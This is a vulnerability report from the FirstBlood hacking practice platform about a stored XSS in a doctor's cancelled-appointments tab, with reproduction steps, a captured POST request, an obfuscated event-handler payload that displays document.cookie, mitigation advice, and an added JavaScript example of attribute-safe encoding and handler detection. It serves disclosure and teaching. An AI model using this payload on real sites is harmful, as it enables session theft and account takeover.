FirstBlood-#848 — Stored XSS in cancelled appointment message
This issue was discovered on FirstBlood v2
On 2021-10-29, vigilante Level 4 reported:
Summary:
Note: This is a report I submitted in V1 of First Blood; I am using another payload that is still vulnerable.
It is possible to trigger a stored XSS in the Doctor's "Cancelled Appointments" tab.
Description:
Stored XSS arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. In our case we can cancel an appointment with a message payload that triggers XSS when a Doctor opens up the "Cancelled Appointments" tab and hovers over our cancelled appointment.
Steps to Reproduce:
- Make a new appointment here /book-appointment.php and note the Appointment ID.
- Go to "Manage appointment" and use the Appointment ID from Step 1. Retrieve the appointment.
- Send a request to cancel the appointment and capture it with Burp.
- Modify the request, add a message and use this payload:
&message=blah"%20onpointereNTER="eval.call`${'confirm\x28document.cookie\x29'}`"%20new="1
POST /api/ma.php?success&aptid=25db63a8-0561-4f6c-bd44-e4d217d94ad6 HTTP/1.1
Host: f6cca1fc0660-vigilante.a.firstbloodhackers.com
Cookie: drps=5825d2c88a1a5de2a23a7b6c8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Site-Req: permitted
Csrf: 99215d4e-0ff3-4275
Content-Length: 140
Origin: https://f6cca1fc0660-vigilante.a.firstbloodhackers.com
Referer: https://f6cca1fc0660-vigilante.a.firstbloodhackers.com/manageappointment.php?success&aptid=25db63a8-0561-4f6c-bd44-e4d217d94ad6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

message=blah"%20onpointereNTER="eval.call`${'confirm\x28document.cookie\x29'}`"%20new="1&id=25db63a8-0561-4f6c-bd44-e4d217d94ad6&act=cancel
- Log in as DrAdmin and go to the "Cancelled Appointments" tab /drpanel/cancelled.php.
Here's how our message with the XSS payload will be rendered.
- Hover over our appointment; an XSS message with the drps cookie will pop up.
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Mitigation
Use input filtering to prevent storing the XSS payload. Encode the output to prevent it from being interpreted as active content when displayed on the website.
P2 High
Endpoint: /api/ma.php
Parameter: message=
Payload: blah"%20onpointereNTER="eval.call`${'confirm\x28document.cookie\x29'}`"%20new="1
FirstBlood ID: 22
Vulnerability Type: Stored XSS
Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues, for example when creating and editing an appointment and not just when cancelling it. Making use of htmlentities() and relying on .value() in JavaScript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also leaves admins viewing cancelled appointments vulnerable.
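The mitigation above and the verdict paragraph both come down to output-context encoding: the message ends up inside an HTML attribute, and an encoder written for text between tags leaves the quote characters that the report's payload relies on. The following is an added example, not FirstBlood's own code; the tooltip template, both encoder functions and the attribute lister are assumptions used to illustrate that point, since the page does not show the real rendering code.

```javascript
// Added example: attribute-context encoding for the cancelled-appointment
// message. Nothing here is FirstBlood's code; the row template is assumed.

// The report's payload, URL-decoded. The \x28 / \x29 sequences are literal
// characters in the stored message (the browser decodes them later).
const REPORT_MESSAGE =
  'blah" onpointereNTER="eval.call`${\'confirm\\x28document.cookie\\x29\'}`" new="1';

// Insufficient for attributes: encodes only what matters between tags and
// leaves both quote characters untouched.
function encodeTextOnly(s) {
  return String(s).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Attribute-safe: additionally encodes " and ', so a value can never close
// the attribute it was placed in and start another one.
function encodeAttr(s) {
  return encodeTextOnly(s).replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Hypothetical row: the message is shown on hover through a title attribute.
function renderCancelledRow(message, encoder) {
  return '<div class="apt" title="' + encoder(message) + '">Cancelled</div>';
}

// Small attribute lister for the opening tag, usable as a template self-check.
function attributeNames(html) {
  const tag = html.slice(0, html.indexOf('>') + 1);
  const names = [];
  const re = /\s([^\s"'=<>`]+)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Detection-style check: did the rendered markup grow an on* event handler?
function hasInjectedHandler(html) {
  return attributeNames(html).some((n) => n.startsWith('on'));
}

const unsafe = renderCancelledRow(REPORT_MESSAGE, encodeTextOnly);
const safe = renderCancelledRow(REPORT_MESSAGE, encodeAttr);
console.log(attributeNames(unsafe)); // [ 'class', 'title', 'onpointerenter', 'new' ]
console.log(attributeNames(safe));   // [ 'class', 'title' ]
```

The same check applied to the page's other reported contexts (create and edit) would show whether each template encodes for the context it writes into, which is the gap the verdict paragraph describes.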